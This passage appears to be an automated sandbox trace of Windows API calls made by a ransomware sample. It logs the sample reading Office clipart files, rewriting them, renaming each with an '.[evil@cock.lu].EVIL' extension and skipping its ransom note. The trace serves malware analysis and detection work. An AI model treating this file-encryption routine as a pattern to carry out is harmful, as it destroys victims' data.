_File=0x7ffc020ee2a0) returned 51 [0114.101] __uncaught_exception () returned 0x84b1160800 [0114.101] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0114.101] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00444_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00444_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00444_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00444_.wmf.[evil@cock.lu].evil")) returned 1 [0114.101] ??_V@YAXPEAX@Z () returned 0x1 [0114.104] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00444_.WMF", dwFileAttributes=0x200) returned 0 [0114.104] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0114.104] wcsstr (_Str="BS00445_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0114.104] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00445_.WMF") returned 69 [0114.104] wcscmp (_String1="BS00445_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0114.104] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BS00445_.WMF") returned 0x0 [0114.104] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00445_.WMF") returned 0x45 [0114.104] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00445_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00445_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0114.106] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xed4, lpOverlapped=0x0) returned 1 [0114.126] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0114.127] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0114.127] _errno () returned 0x84b1160840 [0114.127] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.127] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0xee0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xee0, lpOverlapped=0x0) returned 1 [0114.127] CloseHandle (hObject=0x1a8) returned 1 [0114.127] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00445_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0114.127] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0114.127] __uncaught_exception () returned 0x84b1160800 [0114.127] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0114.127] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00445_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00445_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00445_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00445_.wmf.[evil@cock.lu].evil")) returned 1 [0114.128] ??_V@YAXPEAX@Z () returned 0x1 [0114.131] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00445_.WMF", dwFileAttributes=0x200) returned 0 [0114.131] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0114.131] wcsstr (_Str="BS00453_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0114.131] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00453_.WMF") returned 69 [0114.131] wcscmp (_String1="BS00453_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0114.131] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BS00453_.WMF") returned 0x0 [0114.131] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00453_.WMF") returned 0x45 [0114.131] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00453_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00453_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0114.133] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x984, lpOverlapped=0x0) returned 1 [0114.145] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0114.145] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0114.145] _errno () returned 0x84b1160840 [0114.145] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.145] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x9a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x9a0, lpOverlapped=0x0) returned 1 [0114.145] CloseHandle (hObject=0x1a8) returned 1 [0114.145] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00453_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0114.145] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0114.145] __uncaught_exception () returned 0x84b1160800 [0114.145] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0114.145] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00453_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00453_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00453_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00453_.wmf.[evil@cock.lu].evil")) returned 1 [0114.146] ??_V@YAXPEAX@Z () returned 0x1 [0114.149] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00453_.WMF", dwFileAttributes=0x200) returned 0 [0114.149] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0114.149] wcsstr (_Str="BS01080_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0114.149] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01080_.WMF") returned 69 [0114.149] wcscmp (_String1="BS01080_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0114.149] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BS01080_.WMF") returned 0x0 [0114.149] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01080_.WMF") returned 0x45 [0114.149] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01080_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01080_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0114.152] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xaac, lpOverlapped=0x0) returned 1 [0114.159] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0114.159] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0114.159] _errno () returned 0x84b1160840 [0114.159] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.159] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0xac0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xac0, lpOverlapped=0x0) returned 1 [0114.159] CloseHandle (hObject=0x1a8) returned 1 [0114.159] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01080_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0114.160] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0114.160] __uncaught_exception () returned 0x84b1160800 [0114.160] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0114.160] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01080_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01080_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01080_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01080_.wmf.[evil@cock.lu].evil")) returned 1 [0114.160] ??_V@YAXPEAX@Z () returned 0x1 [0114.163] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01080_.WMF", dwFileAttributes=0x200) returned 0 [0114.163] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0114.163] wcsstr (_Str="BS01603_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0114.163] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01603_.WMF") returned 69 [0114.163] wcscmp (_String1="BS01603_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0114.163] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BS01603_.WMF") returned 0x0 [0114.164] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01603_.WMF") returned 0x45 [0114.164] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01603_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01603_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0114.168] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1c08, lpOverlapped=0x0) returned 1 [0114.192] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0114.192] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0114.192] _errno () returned 0x84b1160840 [0114.192] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.192] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x1c20, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1c20, lpOverlapped=0x0) returned 1 [0114.192] CloseHandle (hObject=0x1a8) returned 1 [0114.193] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01603_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0114.193] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0114.193] __uncaught_exception () returned 0x84b1160800 [0114.193] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0114.193] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01603_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01603_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01603_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01603_.wmf.[evil@cock.lu].evil")) returned 1 [0114.194] ??_V@YAXPEAX@Z () returned 0x1 [0114.197] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01603_.WMF", dwFileAttributes=0x200) returned 0 [0114.197] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0114.197] wcsstr (_Str="BS01634_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0114.197] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01634_.WMF") returned 69 [0114.197] wcscmp (_String1="BS01634_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0114.197] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BS01634_.WMF") returned 0x0 [0114.197] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01634_.WMF") returned 0x45 [0114.197] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01634_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01634_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0114.200] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xda6, lpOverlapped=0x0) returned 1 [0114.210] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0114.210] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0114.210] _errno () returned 0x84b1160840 [0114.210] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.210] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0xdc0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xdc0, lpOverlapped=0x0) returned 1 [0114.210] CloseHandle (hObject=0x1a8) returned 1 [0114.210] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01634_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0114.211] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0114.211] __uncaught_exception () returned 0x84b1160800 [0114.211] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0114.211] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01634_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01634_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01634_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01634_.wmf.[evil@cock.lu].evil")) returned 1 [0114.211] ??_V@YAXPEAX@Z () returned 0x1 [0114.214] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01634_.WMF", dwFileAttributes=0x200) returned 0 [0114.215] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0114.215] wcsstr (_Str="BS01635_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0114.215] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01635_.WMF") returned 69 [0114.215] wcscmp (_String1="BS01635_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0114.215] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BS01635_.WMF") returned 0x0 [0114.215] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01635_.WMF") returned 0x45 [0114.215] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01635_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01635_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0114.217] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3a94, lpOverlapped=0x0) returned 1 [0114.227] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0114.227] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0114.227] _errno () returned 0x84b1160840 [0114.227] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.227] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x3aa0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3aa0, lpOverlapped=0x0) returned 1 [0114.227] CloseHandle (hObject=0x1a8) returned 1 [0114.227] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01635_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0114.227] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0114.227] __uncaught_exception () returned 0x84b1160800 [0114.228] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0114.228] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01635_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01635_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01635_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01635_.wmf.[evil@cock.lu].evil")) returned 1 [0114.228] ??_V@YAXPEAX@Z () returned 0x1 [0114.231] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01635_.WMF", dwFileAttributes=0x200) returned 0 [0114.231] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0114.262] wcsstr (_Str="BS01636_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0114.262] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01636_.WMF") returned 69 [0114.262] wcscmp (_String1="BS01636_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0114.262] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BS01636_.WMF") returned 0x0 [0114.262] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01636_.WMF") returned 0x45 [0114.262] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01636_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01636_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0114.264] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x752, lpOverlapped=0x0) returned 1 [0114.275] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0114.275] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0114.275] _errno () returned 0x84b1160840 [0114.275] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.275] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x760, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x760, lpOverlapped=0x0) returned 1 [0114.276] CloseHandle (hObject=0x1a8) returned 1 [0114.276] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01636_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0114.276] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0114.276] __uncaught_exception () returned 0x84b1160800 [0114.276] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0114.276] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01636_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01636_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01636_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01636_.wmf.[evil@cock.lu].evil")) returned 1 [0114.277] ??_V@YAXPEAX@Z () returned 0x1 [0114.280] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01636_.WMF", dwFileAttributes=0x200) returned 0 [0114.280] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0114.280] wcsstr (_Str="BS01637_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0114.280] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01637_.WMF") returned 69 [0114.280] wcscmp (_String1="BS01637_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0114.280] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BS01637_.WMF") returned 0x0 [0114.280] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01637_.WMF") returned 0x45 [0114.280] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01637_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01637_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0114.282] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xf6c, lpOverlapped=0x0) returned 1 [0114.288] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0114.288] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0114.288] _errno () returned 0x84b1160840 [0114.288] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.288] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0xf80, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xf80, lpOverlapped=0x0) returned 1 [0114.288] CloseHandle (hObject=0x1a8) returned 1 [0114.288] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01637_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0114.289] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0114.289] __uncaught_exception () returned 0x84b1160800 [0114.289] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0114.289] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01637_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01637_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft 